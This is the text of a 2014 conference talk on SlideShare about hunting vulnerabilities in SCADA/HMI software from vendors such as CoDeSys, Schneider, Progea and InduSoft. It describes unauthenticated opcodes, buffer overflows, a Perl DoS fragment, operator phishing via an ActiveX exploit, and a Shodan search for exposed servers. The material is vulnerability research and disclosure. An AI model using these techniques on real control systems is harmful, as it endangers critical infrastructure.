SCADA Software or Swiss
Cheese Software?
Code Blue 2014 , Tokyo
Celil ÜNÜVER, SignalSEC Ltd.
Agenda
• About me
• How it started?
• Why are SCADA apps so BUGGY?
• Hunting SCADA vulnerabilities
• Analysis of the vulne...
About me
• Co-founder and Researcher @ SignalSEC Ltd.
• Organizer of NOPcon Hacker Conference
(Istanbul,Turkey)
• Interest...
How it started?
• SCADA systems are in our daily life for long
years!
• There was not too much interest in SCADA
Security
Milestone
• Stuxnet and Duqu attacks in 2010 – 2011
• SCADA systems got attention of hackers and
researchers after these a...
No more stuxnet
• Sure , all of us know about stuxnet!
SCADA Overview
ICS Vulnerabilities
• Hardware/Firmware Vulnerabilities:
Vulns in PLC & RTU devices
• Software Vulnerabilities:
Vulns in C...
TWO DOZEN BUGS IN A FEW HOURS
Trust me , it’s easy!
Actually, it’s really easy to hunt SCADA BUGS!!!
Why it’s easy?
There wasn’t a real threat for SCADA software
until 2010
So the developers were not aware of SECURE
Develop...
Hunting Vulnerabilities
• Simple reversing rocks!
• 1-) Analyze the target software (Potentatial
inputs; communication pro...
Hunting Vulnerabilities
“You must understand that there is more than
one path to the top of the mountain.”
- Miyamoto Musa...
Case-1: CoDeSys Gateway Vuln
• CoDeSys is development environment for
industrial control systems used by lots of
manufactu...
Case-1 : CoDeSys - RECON
• Listening PORT
Case-1: CoDeSys - Debug
• Breakpoint on recv()
• Send junk bytes
• Breapoint Access on recv’s ‘buf’ parameter
Case-1: CoDeSys - Debug
• Comparing
Case-1: CoDeSys – Switch Cases /
Opcodes
• After we pass the comparison
Case-1: CoDeSys – Switch Cases
• Let’s find the bugs
Case-1: CoDeSys – Delete File
• Opcode : 13
Case-1: CoDeSys – Upload File
• Opcode: 6
Case-1: Recommendation
• Actually, file remove / upload bugs are
‘feature’ of this application 
• But there is no authent...
An Interesting Story: Progea MOVICON
Vulnerability – still 0day
“When a patch doesn’t patch anything!”
• 23 Nov 2013: I’ve...
An Interesting Story: Progea MOVICON
Vulnerability – 0day
• 5 Dec 2013:
• from ICS-CERT to me;
An Interesting Story: Progea MOVICON
Vulnerability – 0day
• THEY SAY : The bugs you discovered are SIMILAR to a bunch
of O...
An Interesting Story: Progea MOVICON
Vulnerability – 0day
• These bugs are similar to the bugs that we analyzed
in Case-1:...
An Interesting Story: Progea MOVICON
Vulnerability – 0day
An Interesting Story: Progea MOVICON
Vulnerability – 0day
• Remote Information Disclosure: opcode [-censored-]
An Interesting Story: Progea MOVICON
Vulnerability – 0day
• Opcode [-censored-] calls GetVersionExA API and sends
output t...
An Interesting Story: Progea MOVICON
Vulnerability – 0day
• Here is a simple PoC for this bug;
An Interesting Story: Progea MOVICON
Vulnerability – 0day
• When we run it and call opcode [-censored-]:
• 6th byte in pri...
An Interesting Story: Progea MOVICON
Vulnerability – 0day
• So what is the problem? Why old bugs are still there !?
• Afte...
PROGEA, your fail is unbelievable!
Temporary solution
• Block remote connections to TCP:10651
• If you contact me in personal , I can share vulnerability
sig...
Case-3: CoDeSys WebVisu
• CodeSys WebVisu uses a webserver which is
usually open to Internet for visualization of
PLC
• Di...
Case-3: CoDeSys Vulnerability
• Buffer overflow vulnerability when parsing
long http requests due to an unsafe function.
•...
Case-4: Schneider IGSS Vulnerability
• Gas Distrubution in Europe
• Airport in Asia
• Traffic Control Center in Europe
Case-4: Schneider IGSS Vulnerability
• Discovered by me
• Status: Patched
• IGSS listens 12399 and 12397 ports in runtime
...
Case-5: Schneider Electric
Accutech Heap Overflow Vulnerability
Buffer overflow vulnerability when parsing long http reque...
Case-5: Schneider Electric
Accutech Heap Overflow Vulnerability
Case-3: Schneider Electric
Accutech Heap Overflow Vulnerability
Case-6: Pwning the Operator
Case-6: Invensys Wonderware
System Platform Vulnerability
• Discovered by me
• Status: Patched
• Killing five birds with o...
Case-6: Invensys Wonderware
System Platform Vulnerability
• An ActiveX Buffer Overflow vulnerability
• Just found by Activ...
Case-7: InduSoft HMI Bugs
Case-7: InduSoft HMI Bugs
• This is really creepy!
• This software doesn’t check even any “magic”
value of incoming packet...
Case-7: InduSoft HMI Exploit

Finding Targets
• Banner Information: “3S_WebServer”
• Let’s search it on SHODAN! 
CoDeSys WebServer on SHODAN
Server’s Banner : “3S_WebServer”
Shodan Results: 151
Demo
• DEMO
Conclusion
• Critical Infrastructures are juicy targets!
• Hacktivists are interested in SCADA Hacking
too. Not only gover...
D Thank you!
• Contact:
• cunuver@signalsec.com
• Twitter: @celilunuver
• www.signalsec.com
• www.securityarchitect.org
Upcoming SlideShare
Loading in...5
×

SCADA Software or Swiss Cheese Software - CODE BLUE, Japan

289

Published on

The talk is about discovering SCADA vulnerabilities.

Published in: Technology, Business
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
289
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
10
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

SCADA Software or Swiss Cheese Software - CODE BLUE, Japan

  1. 1. SCADA Software or Swiss Cheese Software? Code Blue 2014 , Tokyo Celil ÜNÜVER, SignalSEC Ltd.
  2. 2. Agenda • About me • How it started? • Why are SCADA apps so BUGGY? • Hunting SCADA vulnerabilities • Analysis of the vulnerabilities
  3. 3. About me • Co-founder and Researcher @ SignalSEC Ltd. • Organizer of NOPcon Hacker Conference (Istanbul,Turkey) • Interested in vulnerability research , reversing • Hunted a lot of bugs affect Adobe, IBM, Microsoft, Facebook, Novell , SCADA vendors etc. • Has been a speaker at CONFidence, Swiss Cyber Storm, c0c0n etc.
  4. 4. How it started? • SCADA systems are in our daily life for long years! • There was not too much interest in SCADA Security
  5. 5. Milestone • Stuxnet and Duqu attacks in 2010 – 2011 • SCADA systems got attention of hackers and researchers after these attacks. • Critical systems , fame, profit etc.. • They are all JUICY target • Lots of SCADA systems are open to INTERNET
  6. 6. No more stuxnet • Sure , all of us know about stuxnet!
  7. 7. SCADA Overview
  8. 8. ICS Vulnerabilities • Hardware/Firmware Vulnerabilities: Vulns in PLC & RTU devices • Software Vulnerabilities: Vulns in Control System Software(HMI) but also affects PLC/RTU devices
  9. 9. TWO DOZEN BUGS IN A FEW HOURS
  10. 10. Trust me , it’s easy! Actually, it’s really easy to hunt SCADA BUGS!!!
  11. 11. Why it’s easy? There wasn’t a real threat for SCADA software until 2010 So the developers were not aware of SECURE Development
  12. 12. Hunting Vulnerabilities • Simple reversing rocks! • 1-) Analyze the target software (Potentatial inputs; communication protocols, activex etc.) • 2-) Discover & trace the input • 3-) Hunt the bugs.
  13. 13. Hunting Vulnerabilities “You must understand that there is more than one path to the top of the mountain.” - Miyamoto Musashi -
  14. 14. Case-1: CoDeSys Gateway Vuln • CoDeSys is development environment for industrial control systems used by lots of manufacturers. • Aaron Portnoy from Exodus discovered these vulnerabilities. • Status: Patched
  15. 15. Case-1 : CoDeSys - RECON • Listening PORT
  16. 16. Case-1: CoDeSys - Debug • Breakpoint on recv() • Send junk bytes • Breapoint Access on recv’s ‘buf’ parameter
  17. 17. Case-1: CoDeSys - Debug • Comparing
  18. 18. Case-1: CoDeSys – Switch Cases / Opcodes • After we pass the comparison
  19. 19. Case-1: CoDeSys – Switch Cases • Let’s find the bugs
  20. 20. Case-1: CoDeSys – Delete File • Opcode : 13
  21. 21. Case-1: CoDeSys – Upload File • Opcode: 6
  22. 22. Case-1: Recommendation • Actually, file remove / upload bugs are ‘feature’ of this application  • But there is no authentication for these operations. Somebody can reverse the packet structure and use these features for evil! • To solve this kind of bugs, developers should add an “authentication” step before executig opcodes. • Patched in 2013
  23. 23. An Interesting Story: Progea MOVICON Vulnerability – still 0day “When a patch doesn’t patch anything!” • 23 Nov 2013: I’ve discovered some vulnerabilities on the latest version of Progea MOVICON HMI software • 24 Nov 2013: We’ve published a short analysis on Pastebin • 3 Dec 2013: ICS-CERT contacted us about the post on Pastebin. They asked details , we sent information etc.
  24. 24. An Interesting Story: Progea MOVICON Vulnerability – 0day • 5 Dec 2013: • from ICS-CERT to me;
  25. 25. An Interesting Story: Progea MOVICON Vulnerability – 0day • THEY SAY : The bugs you discovered are SIMILAR to a bunch of OLDER BUGS and PATCHED IN 2011. • ICSA-11-056; • My findings looks exactly same!!!! But I am able to reproduce on the latest version!!
  26. 26. An Interesting Story: Progea MOVICON Vulnerability – 0day • These bugs are similar to the bugs that we analyzed in Case-1:CoDeSys • There is NO authentication to call some functions , operations in the software. Somebody can reverse the packet structure and use these features for evil! • After a conversation with Code Blue staff, we have decided to mask some details of this zero-day vulnerability.
  27. 27. An Interesting Story: Progea MOVICON Vulnerability – 0day
  28. 28. An Interesting Story: Progea MOVICON Vulnerability – 0day • Remote Information Disclosure: opcode [-censored-]
  29. 29. An Interesting Story: Progea MOVICON Vulnerability – 0day • Opcode [-censored-] calls GetVersionExA API and sends output to the client
  30. 30. An Interesting Story: Progea MOVICON Vulnerability – 0day • Here is a simple PoC for this bug;
  31. 31. An Interesting Story: Progea MOVICON Vulnerability – 0day • When we run it and call opcode [-censored-]: • 6th byte in printed data is "dwMajorVersion" which is a return value of GetVersionExA and gives information about the OS. • Status: PATCHED(!) in 2011 but we are able to exploit it in 2014!
  32. 32. An Interesting Story: Progea MOVICON Vulnerability – 0day • So what is the problem? Why old bugs are still there !? • After comparing the older version and the latest version , I understood that actually vendor didn’t patch anything. • Instead of fixing vulnerabilities, they just changed “opcodes” of the functions in new version! • Older version: Opcode 7 causes info disclosure vulnerability by calling GetVersionEx API • New version: They just changed opcode “7” to “X” for calling GetversionEx API
  33. 33. PROGEA, your fail is unbelievable!
  34. 34. Temporary solution • Block remote connections to TCP:10651 • If you contact me in personal , I can share vulnerability signatures that you can use in your IDS/IPS (snort etc.)
  35. 35. Case-3: CoDeSys WebVisu • CodeSys WebVisu uses a webserver which is usually open to Internet for visualization of PLC • Discovered by me • Status: Patched
  36. 36. Case-3: CoDeSys Vulnerability • Buffer overflow vulnerability when parsing long http requests due to an unsafe function. • It uses “vsprintf” to print which file is requested.
  37. 37. Case-4: Schneider IGSS Vulnerability • Gas Distrubution in Europe • Airport in Asia • Traffic Control Center in Europe
  38. 38. Case-4: Schneider IGSS Vulnerability • Discovered by me • Status: Patched • IGSS listens 12399 and 12397 ports in runtime • A simple bunch of code causes to DoS use IO::Socket; $host = "localhost"; $port = 12399; $port2 = 12397; $first = "x01x01x00x00"; $second = "x02x01x00x00";
  39. 39. Case-5: Schneider Electric Accutech Heap Overflow Vulnerability Buffer overflow vulnerability when parsing long http requests due to an unsafe function Status: Patched
  40. 40. Case-5: Schneider Electric Accutech Heap Overflow Vulnerability
  41. 41. Case-3: Schneider Electric Accutech Heap Overflow Vulnerability
  42. 42. Case-6: Pwning the Operator
  43. 43. Case-6: Invensys Wonderware System Platform Vulnerability • Discovered by me • Status: Patched • Killing five birds with one stone 
  44. 44. Case-6: Invensys Wonderware System Platform Vulnerability • An ActiveX Buffer Overflow vulnerability • Just found by ActiveX fuzzing... • Send the exploit URL to HMI Operator • Click and pwn !
  45. 45. Case-7: InduSoft HMI Bugs
  46. 46. Case-7: InduSoft HMI Bugs • This is really creepy! • This software doesn’t check even any “magic” value of incoming packets. There is no custom packet structure! • Sending 1 byte to TCP:4322 is enough to jump a switch case
  47. 47. Case-7: InduSoft HMI Exploit 
  48. 48. Finding Targets • Banner Information: “3S_WebServer” • Let’s search it on SHODAN! 
  49. 49. CoDeSys WebServer on SHODAN Server’s Banner : “3S_WebServer” Shodan Results: 151
  50. 50. Demo • DEMO
  51. 51. Conclusion • Critical Infrastructures are juicy targets! • Hacktivists are interested in SCADA Hacking too. Not only government intelligence agencies. • Applications are insecure!
  52. 52. D Thank you! • Contact: • cunuver@signalsec.com • Twitter: @celilunuver • www.signalsec.com • www.securityarchitect.org
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×